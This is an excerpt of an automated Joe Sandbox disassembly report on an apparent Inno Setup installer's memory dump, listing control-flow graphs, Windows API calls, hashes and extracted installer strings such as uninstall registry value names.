GetFocus call 418158 SetFocus call 4151b8 SetFocus 1644->1667 1647->1648 1648->1541 1660->1541 1670 423f1a-423f24 1660->1670 1667->1541 1670->1541
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 888119ddc5a0f7a35e35ccf60c25e0d3911fcf890f139968765b0e795750a49e
                                                                                  • Instruction ID: e0cc310aaac482fffc1525dc35abae08b3544f114fff788f17fe57ea4da736a4
                                                                                  • Opcode Fuzzy Hash: 888119ddc5a0f7a35e35ccf60c25e0d3911fcf890f139968765b0e795750a49e
                                                                                  • Instruction Fuzzy Hash: 51E16C34700124EBD710DFAAE585B6EB7B0EF44305FA481AAE5059B352C73DEE82DB09

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1910 461058-46106e 1911 461070-461073 call 402d48 1910->1911 1912 461078-46112f call 420124 call 402b48 * 6 1910->1912 1911->1912 1929 461131-461158 call 4145b4 1912->1929 1930 46116c-461185 1912->1930 1934 46115d-461167 call 414574 1929->1934 1935 46115a 1929->1935 1936 461187-4611ae call 414594 1930->1936 1937 4611c2-4611d0 call 488f78 1930->1937 1934->1930 1935->1934 1943 4611b3-4611bd call 414554 1936->1943 1944 4611b0 1936->1944 1945 4611d2-4611e1 call 488e38 1937->1945 1946 4611e3-4611e5 call 488f5c 1937->1946 1943->1937 1944->1943 1951 4611ea-46123d call 488a24 call 41a348 * 2 1945->1951 1946->1951 1958 46124e-461263 call 44ffc8 call 414a90 1951->1958 1959 46123f-46124c call 414a90 1951->1959 1964 461268-46126f 1958->1964 1959->1964 1966 4612b7-46173d call 488d98 call 489034 call 414594 * 3 call 414634 call 414554 * 3 call 45b828 call 45b840 call 45b84c call 45b894 call 45b828 call 45b840 call 45b84c call 45b894 call 45b840 call 45b894 LoadBitmapA call 41d628 call 45b864 call 45b87c call 460eb4 call 4628c8 call 4604fc call 403594 call 414a90 call 460834 call 460864 call 4604fc call 403594 * 2 call 414a90 call 4628c8 call 4604fc call 414a90 call 460834 call 460864 call 414a90 * 2 call 4628c8 call 414a90 * 2 call 460834 call 414574 call 460834 call 414574 call 4628c8 call 414a90 call 460834 call 460864 call 4628c8 call 414a90 call 460834 call 414574 * 2 call 414a90 call 460834 call 414574 1964->1966 1967 461271-4612b2 call 414634 call 414678 call 420f10 call 420f3c call 420ae0 call 420b0c 1964->1967 2097 46173f-461797 call 414574 call 414a90 call 460834 call 414574 1966->2097 2098 461799-4617b2 call 4149bc * 2 1966->2098 1967->1966 2106 4617b7-461868 call 4604fc call 4628c8 call 4604fc call 414a90 call 489034 call 460834 2097->2106 2098->2106 2124 4618a2-461ac9 call 4604fc call 414a90 call 489044 * 2 call 42e5d0 call 414574 call 460834 call 414574 call 414a90 call 488d98 call 489034 call 414594 call 4604fc call 414a90 call 460834 call 414574 call 4604fc call 4628c8 call 4604fc call 414a90 call 460834 call 414574 call 460864 call 4604fc call 414a90 call 460834 2106->2124 2125 46186a-461885 2106->2125 2182 461b0a-461bc3 call 4604fc call 4628c8 call 4604fc call 414a90 call 489034 call 460834 2124->2182 2183 461acb-461ad4 2124->2183 2127 461887 2125->2127 2128 46188a-46189d call 414574 2125->2128 2127->2128 2128->2124 2201 461bc5-461be0 2182->2201 2202 461bfd-462029 call 4604fc call 414a90 call 489044 * 2 call 42e5d0 call 414574 call 460834 call 414574 call 414a90 call 488d98 call 489034 call 414594 call 414a90 call 4604fc call 4628c8 call 4604fc call 414a90 call 460834 call 460864 call 42bb48 call 489044 call 44dab4 call 4604fc call 4628c8 call 4604fc call 4628c8 call 4604fc call 4628c8 * 2 call 414a90 call 460834 call 460864 call 4628c8 call 488a24 call 41a348 call 4604fc call 403594 call 414a90 call 460834 call 414574 call 414a90 * 2 call 489044 call 4034ac call 403594 * 2 call 414a90 2182->2202 2183->2182 2184 461ad6-461b05 call 4149bc call 460864 2183->2184 2184->2182 2203 461be5-461bf8 call 414574 2201->2203 2204 461be2 2201->2204 2301 46204d-462054 2202->2301 2302 46202b-462048 call 44ef18 call 44f04c 2202->2302 2203->2202 2204->2203 2304 462056-462073 call 44ef18 call 44f04c 2301->2304 2305 462078-46207f 2301->2305 2302->2301 2304->2305 2308 4620a3-4620f0 call 418158 GetSystemMenu AppendMenuA call 403750 AppendMenuA call 4629bc 2305->2308 2309 462081-46209e call 44ef18 call 44f04c 2305->2309 2322 4620f6-4620ff 2308->2322 2323 462199-4621a0 2308->2323 2309->2308 2324 462101-462158 call 471e10 call 414a90 call 471e10 call 414a90 call 471e10 call 414a90 2322->2324 2325 46215a-462194 call 414a90 * 3 2322->2325 2326 4621a6-4621c9 call 471e10 call 403468 2323->2326 2327 462234-462242 call 414a90 2323->2327 2324->2323 2325->2323 2352 4621db-4621ef call 4034ac 2326->2352 2353 4621cb-4621d9 call 4034ac 2326->2353 2332 462247-462250 2327->2332 2336 462256-46226e call 429f50 2332->2336 2337 4622f2-462311 2332->2337 2356 462270-462274 2336->2356 2357 4622cb-4622cf 2336->2357 2343 462355-462384 call 42b8e4 call 44da40 2337->2343 2344 462313-462317 2337->2344 2378 46241a-462421 2343->2378 2379 46238a-46238e 2343->2379 2350 462319-462339 call 40b3b4 call 43001c 2344->2350 2390 46234f-462353 2350->2390 2391 46233b-462349 2350->2391 2369 462201-462232 call 42c6cc call 42ca74 call 4034ac call 414a90 2352->2369 2372 4621f1-4621fc call 4034ac 2352->2372 2353->2369 2366 462276-4622c0 call 40b3b4 call 471e10 call 406a10 2356->2366 2362 4622e3-4622ed call 429fd4 2357->2362 2363 4622d1-4622e1 call 429fd4 2357->2363 2362->2337 2363->2337 2440 4622c5-4622c9 2366->2440 2441 4622c2 2366->2441 2369->2332 2372->2369 2385 462423-462439 call 463430 2378->2385 2386 46248d-462491 2378->2386 2387 462390-4623a2 call 40b3b4 2379->2387 2402 46252a-46253f call 460c14 call 460980 2385->2402 2410 46243f-46244a 2385->2410 2394 462502-46250b 2386->2394 2395 462493-4624aa call 40b3b4 2386->2395 2411 4623d4-46240b call 471e10 call 44bb20 2387->2411 2412 4623a4-4623d2 call 471e10 call 44bbf0 2387->2412 2390->2343 2390->2350 2391->2390 2401 46250d-462525 call 40b3b4 call 4634b8 2394->2401 2394->2402 2416 4624e2-462500 call 40b3b4 call 4634b8 2395->2416 2417 4624ac-4624e0 call 40b3b4 call 4634b8 call 463430 2395->2417 2401->2402 2444 462591-46259b call 4149bc 2402->2444 2445 462541-462564 call 429fb8 call 40b3b4 2402->2445 2410->2402 2419 462450-462454 2410->2419 2442 462410-462414 2411->2442 2412->2442 2416->2402 2417->2402 2428 462456-46246c call 40b3b4 2419->2428 2453 462482-462486 2428->2453 2454 46246e-46247d call 429fd4 2428->2454 2440->2357 2440->2366 2441->2440 2442->2378 2442->2387 2456 4625a0-4625bf call 4149bc 2444->2456 2466 462566-46256d 2445->2466 2467 46256f-46257e call 4149bc 2445->2467 2453->2428 2455 462488 2453->2455 2454->2402 2455->2402 2468 4625c1-4625e4 call 429fb8 call 463648 2456->2468 2469 4625e9-46260c call 471e10 call 403468 2456->2469 2466->2467 2470 462580-46258f call 4149bc 2466->2470 2467->2456 2468->2469 2482 462627-462630 2469->2482 2483 46260e-462615 2469->2483 2470->2456 2485 462646-462656 call 4034ac 2482->2485 2486 462632-462644 call 40369c 2482->2486 2483->2482 2484 462617-462625 call 4034ac 2483->2484 2493 462668-46267f call 414a90 2484->2493 2485->2493 2486->2485 2494 462658-462663 call 4034ac 2486->2494 2498 4626b5-4626bf call 4149bc 2493->2498 2499 462681-462688 2493->2499 2494->2493 2505 4626c4-4626f2 call 403418 * 3 2498->2505 2500 462695-46269f call 42b05c 2499->2500 2501 46268a-462693 2499->2501 2503 4626a4-4626b3 call 4149bc 2500->2503 2501->2500 2501->2503 2503->2505
                                                                                  APIs
                                                                                    • Part of subcall function 00488E38: GetWindowRect.USER32(00000000), ref: 00488E4E
                                                                                  • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00461427
                                                                                    • Part of subcall function 0041D628: GetObjectA.GDI32(?,00000018,00461441), ref: 0041D653
                                                                                    • Part of subcall function 00460EB4: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00460F51
                                                                                    • Part of subcall function 00460EB4: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00460F77
                                                                                    • Part of subcall function 00460EB4: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00460FD3
                                                                                    • Part of subcall function 00460EB4: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00460FF9
                                                                                    • Part of subcall function 00460864: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,004614DC,00000000,00000000,00000000,0000000C,00000000), ref: 0046087C
                                                                                    • Part of subcall function 00489044: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0048904E
                                                                                    • Part of subcall function 00488D98: 73A1A570.USER32(00000000,?,?,?), ref: 00488DB8
                                                                                    • Part of subcall function 00488D98: SelectObject.GDI32(?,00000000), ref: 00488DDB
                                                                                    • Part of subcall function 00488D98: 73A1A480.USER32(00000000,?,00488E2B,00488E24,?,00000000,?,?,?), ref: 00488E1E
                                                                                    • Part of subcall function 00489034: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0048903E
                                                                                  • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,022777EC,02279448,?,?,02279478,?,?,022794C8,?), ref: 004620AD
                                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004620BE
                                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004620D6
                                                                                    • Part of subcall function 00429FD4: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 00429FEA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$AppendExtractFileIconInfoObject$A480A570BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
                                                                                  • String ID: $(Default)$STOPIMAGE
                                                                                  • API String ID: 1965080796-770201673
                                                                                  • Opcode ID: 1f57ced0d02983f4bfd43fef8bb7531e3fec11ac702d5785e03e8e85b6a2e3c6
                                                                                  • Instruction ID: d6798588e8ae082b72a5c5b518fb4208e9b5398b0d11c99d9a817a38a1dc8ef4
                                                                                  • Opcode Fuzzy Hash: 1f57ced0d02983f4bfd43fef8bb7531e3fec11ac702d5785e03e8e85b6a2e3c6
                                                                                  • Instruction Fuzzy Hash: 34F2E5386005118FCB00EB69C5D9F9A73F1BF49304F1585BAE9049B36AD774AC4ACF9A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A259ClassInfoMessageSend
                                                                                  • String ID: CheckPassword$CheckSerial$InitializeSetup$InitializeSetup returned False; aborting.
                                                                                  • API String ID: 3217714596-4126056991
                                                                                  • Opcode ID: b6218dc8ad9316175a4d0cf9fef045697fd54edfbb36e1e4a6f137f7bf446de2
                                                                                  • Instruction ID: 828e4b9e1b759b0b03efa3d9d7e86949f0ef0a079e153e4ee38fccea9e727ccf
                                                                                  • Opcode Fuzzy Hash: b6218dc8ad9316175a4d0cf9fef045697fd54edfbb36e1e4a6f137f7bf446de2
                                                                                  • Instruction Fuzzy Hash: 1B222C74A00644DFDB10EF69E885A9E77B1FB44314F21897AE8049B362D778DC89CB5C
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,004750B0,?,?,?,?,?,00476315,?,?,00000000), ref: 00474F14
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,00000000,?,00000000,004750B0,?,?,?,?,?,00476315,?), ref: 00474F5D
                                                                                  • FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,00000000,?,00000000,004750B0,?,?,?,?,?,00476315), ref: 00474F6A
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,004750B0,?,?,?,?,?,00476315,?), ref: 00474FB6
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00475083,?,00000000,?,00000000,?,?,00000000,?,00000000,004750B0), ref: 0047505F
                                                                                  • FindClose.KERNEL32(000000FF,0047508A,00475083,?,00000000,?,00000000,?,?,00000000,?,00000000,004750B0), ref: 0047507D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: 03b1c71f3c24c8407fa3d38f12d3cd5105d1fa774f619afde2289d44b0e5b712
                                                                                  • Instruction ID: 21017d7d6e5fd24cfd9f57019cd251151e3dd17cf27c91afe02939130ac7b721
                                                                                  • Opcode Fuzzy Hash: 03b1c71f3c24c8407fa3d38f12d3cd5105d1fa774f619afde2289d44b0e5b712
                                                                                  • Instruction Fuzzy Hash: 4E514071900658AFCB10EF65CC85ADEB7B8EB89315F1085BAE408FB351D6389F458F54
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,0046CBAA,?,?,00000001,0048F038), ref: 0046CAB1
                                                                                  • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,0046CBAA,?,?,00000001,0048F038), ref: 0046CB76
                                                                                  • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,0046CBAA,?,?,00000001,0048F038), ref: 0046CB84
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID: unins$unins???.*
                                                                                  • API String ID: 3541575487-1009660736
                                                                                  • Opcode ID: 7d641751bf6770ec743bfe196cf2f78b068208c791ac18b9a08985892072aae5
                                                                                  • Instruction ID: 1ea8d2aa3b80a77477457a655c3f16fe219f3be00c3baf3ae244837128ddae1a
                                                                                  • Opcode Fuzzy Hash: 7d641751bf6770ec743bfe196cf2f78b068208c791ac18b9a08985892072aae5
                                                                                  • Instruction Fuzzy Hash: 72316271A001489FDB10EF65DC86AEEB7B8EF45714F1044F6E448A72A1EA38AF418F59
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(00000000,?,00000000,00447A21), ref: 0044794A
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004479DD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID:
                                                                                  • API String ID: 2574300362-0
                                                                                  • Opcode ID: d152bdb8c1744f213795237e52d4b04411160b9959e755687999ee43e9d65c73
                                                                                  • Instruction ID: f8a7f5c52815d0b9b01e7890ab02188eccd7610bb8cb2f066c1b74f2f14463cf
                                                                                  • Opcode Fuzzy Hash: d152bdb8c1744f213795237e52d4b04411160b9959e755687999ee43e9d65c73
                                                                                  • Instruction Fuzzy Hash: C04164B0A041059FEB10EF95C485A9EB7F9EB44314F10817BE804BB395D778EE41CB58
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00450A8F,?,?,-00000001,00000000), ref: 00450A69
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,00450A8F,?,?,-00000001,00000000), ref: 00450A71
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileFindFirstLast
                                                                                  • String ID:
                                                                                  • API String ID: 873889042-0
                                                                                  • Opcode ID: 7d94f6a4c4c372393fcf37508bb2e9b49edb7c184c266e95740787c10b9bcdf0
                                                                                  • Instruction ID: fb7ffb6de53fd8dc18053d5576d897c6bf7bb64c895b3d5cf2f5d043cef1e163
                                                                                  • Opcode Fuzzy Hash: 7d94f6a4c4c372393fcf37508bb2e9b49edb7c184c266e95740787c10b9bcdf0
                                                                                  • Instruction Fuzzy Hash: 3DF07D35A00704ABCB10DFAA9C0149EF7ACEF49331751467BFC14E3282EA385E04455C
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048E4C0,00000001,?,004085B7,?,00000000,00408696), ref: 0040850A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: 938139888b6aefd5404da6a7f1bd4e94473ea247af67b3a4c4fa06a28f3937b2
                                                                                  • Instruction ID: a1d1b5ea05b639e6a2b123e0f9bd99a221ef5133bd48c9894fe279a97cc8def5
                                                                                  • Opcode Fuzzy Hash: 938139888b6aefd5404da6a7f1bd4e94473ea247af67b3a4c4fa06a28f3937b2
                                                                                  • Instruction Fuzzy Hash: 16E0D87170021427D711A9595C82EF7725CA758320F00427FB949EB3C6EDB8DE8046ED
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,?,004240C9,?,00000000,004240D4), ref: 00423B26
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: NtdllProc_Window
                                                                                  • String ID:
                                                                                  • API String ID: 4255912815-0
                                                                                  • Opcode ID: 391c0b4f01ace9dc11d42018e655f54e16c96b41035a00a65e5cff4b20b2374c
                                                                                  • Instruction ID: 6b2549595e3eff77fa7de124827ad50bfa7fb1ddb01bbcacd520ec1203557d15
                                                                                  • Opcode Fuzzy Hash: 391c0b4f01ace9dc11d42018e655f54e16c96b41035a00a65e5cff4b20b2374c
                                                                                  • Instruction Fuzzy Hash: 2AF0B379205608AF8B40DF99D588D4ABBE8AB4C260B058295B988CB325C234EE808F90
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: 155867f0b752d5bc0865c807138f36f204893410aa9a7a3dcc994bd07fd6f5b4
                                                                                  • Instruction ID: b18e815f483a5cf24740bbaf93793aacdc11a4d8c920c45c1049785295e5b432
                                                                                  • Opcode Fuzzy Hash: 155867f0b752d5bc0865c807138f36f204893410aa9a7a3dcc994bd07fd6f5b4
                                                                                  • Instruction Fuzzy Hash: 0DD0C2B160860067C701AEA9DC817AA718C8B84352F14093F7C85DB2C2EA7CDF48926A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 373 4678b4-4678e4 374 4678e6-4678ed 373->374 375 4678ef 373->375 376 4678f6-46792e call 40364c call 403750 call 42dc60 374->376 375->376 383 467930-467944 call 403750 call 42dc60 376->383 384 467949-467972 call 403750 call 42db84 376->384 383->384 392 467974-46797d call 4676f4 384->392 393 467982-4679ab call 467810 384->393 392->393 397 4679bd-4679c0 call 403418 393->397 398 4679ad-4679bb call 4034ac 393->398 401 4679c5-467a10 call 467810 call 42c374 call 467858 call 467810 397->401 398->401 411 467a26-467a47 call 453230 call 467810 401->411 412 467a12-467a25 call 467880 401->412 419 467a9d-467aa4 411->419 420 467a49-467a9c call 467810 call 46f868 call 467810 call 46f868 call 467810 411->420 412->411 422 467aa6-467ae3 call 46f868 call 467810 call 46f868 call 467810 419->422 423 467ae4-467aeb 419->423 420->419 422->423 425 467b2c-467b30 423->425 426 467aed-467b2b call 467810 * 3 423->426 428 467b32-467b3d call 471e10 425->428 429 467b3f-467b48 call 4034ac 425->429 426->425 440 467b4d-467cfd call 403790 call 467810 call 471e10 call 467858 call 4034ac call 403594 * 2 call 467810 call 4034ac call 403594 * 2 call 467810 call 471e10 call 467858 call 471e10 call 467858 call 471e10 call 467858 call 471e10 call 467858 call 471e10 call 467858 call 471e10 call 467858 call 471e10 call 467858 call 471e10 call 467858 call 471e10 428->440 429->440 513 467d13-467d21 call 467880 440->513 514 467cff-467d11 call 467810 440->514 518 467d26 513->518 519 467d27-467d35 call 467880 514->519 518->519 521 467d3a-467d42 519->521 522 467d44-467d7a call 488364 521->522 523 467d9c-467db2 RegCloseKey 521->523 522->523
                                                                                  APIs
                                                                                    • Part of subcall function 00467810: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00000001,0048F038,?,004679A3,?,00000000,00467DB3,?,_is1), ref: 00467833
                                                                                  • RegCloseKey.ADVAPI32(?,00467DBA,?,_is1,00000001,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,00467E02,?,?,00000001,0048F038), ref: 00467DAD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseValue
                                                                                  • String ID: " /SILENT$5.1.6$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallLocation$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                  • API String ID: 3132538880-285904165
                                                                                  • Opcode ID: 751bae402b5973df5220ab9278da1cf16cffef616198c9dd74c85be8d1b94ed4
                                                                                  • Instruction ID: ca27773a0b15ea98b2a7e96bb09803267c0be431c1aaecfee8c465493cb9d85e
                                                                                  • Opcode Fuzzy Hash: 751bae402b5973df5220ab9278da1cf16cffef616198c9dd74c85be8d1b94ed4
                                                                                  • Instruction Fuzzy Hash: 9BE16574A041099BDB04EB55D885AAF77B5EB44308F30897FE80067395EB78BE05CB6E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 884 485fa8-485fdc call 40369c 887 485fde-485fed call 4462f0 Sleep 884->887 888 485ff2-485fff call 40369c 884->888 893 486482-48649c call 403438 887->893 894 48602e-48603b call 40369c 888->894 895 486001-486024 call 44634c call 403750 FindWindowA call 4465cc 888->895 902 48606a-486077 call 40369c 894->902 903 48603d-486065 call 44634c call 403750 FindWindowA call 4465cc 894->903 911 486029 895->911 913 486079-4860bb call 4462f0 * 4 SendMessageA call 4465cc 902->913 914 4860c0-4860cd call 40369c 902->914 903->893 911->893 913->893 923 48611c-486129 call 40369c 914->923 924 4860cf-486117 call 4462f0 * 4 PostMessageA call 446424 914->924 932 486178-486185 call 40369c 923->932 933 48612b-486173 call 4462f0 * 4 SendNotifyMessageA call 446424 923->933 924->893 945 4861b2-4861bf call 40369c 932->945 946 486187-4861ad call 44634c call 403750 RegisterClipboardFormatA call 4465cc 932->946 933->893 958 486200-48620d call 40369c 945->958 959 4861c1-4861fb call 4462f0 * 3 SendMessageA call 4465cc 945->959 946->893 973 48620f-48624f call 4462f0 * 3 PostMessageA call 446424 958->973 974 486254-486261 call 40369c 958->974 959->893 973->893 985 4862a8-4862b5 call 40369c 974->985 986 486263-4862a3 call 4462f0 * 3 SendNotifyMessageA call 446424 974->986 996 48630a-486317 call 40369c 985->996 997 4862b7-4862d5 call 44634c call 42e158 985->997 986->893 1008 486319-486345 call 44634c call 403750 call 4462f0 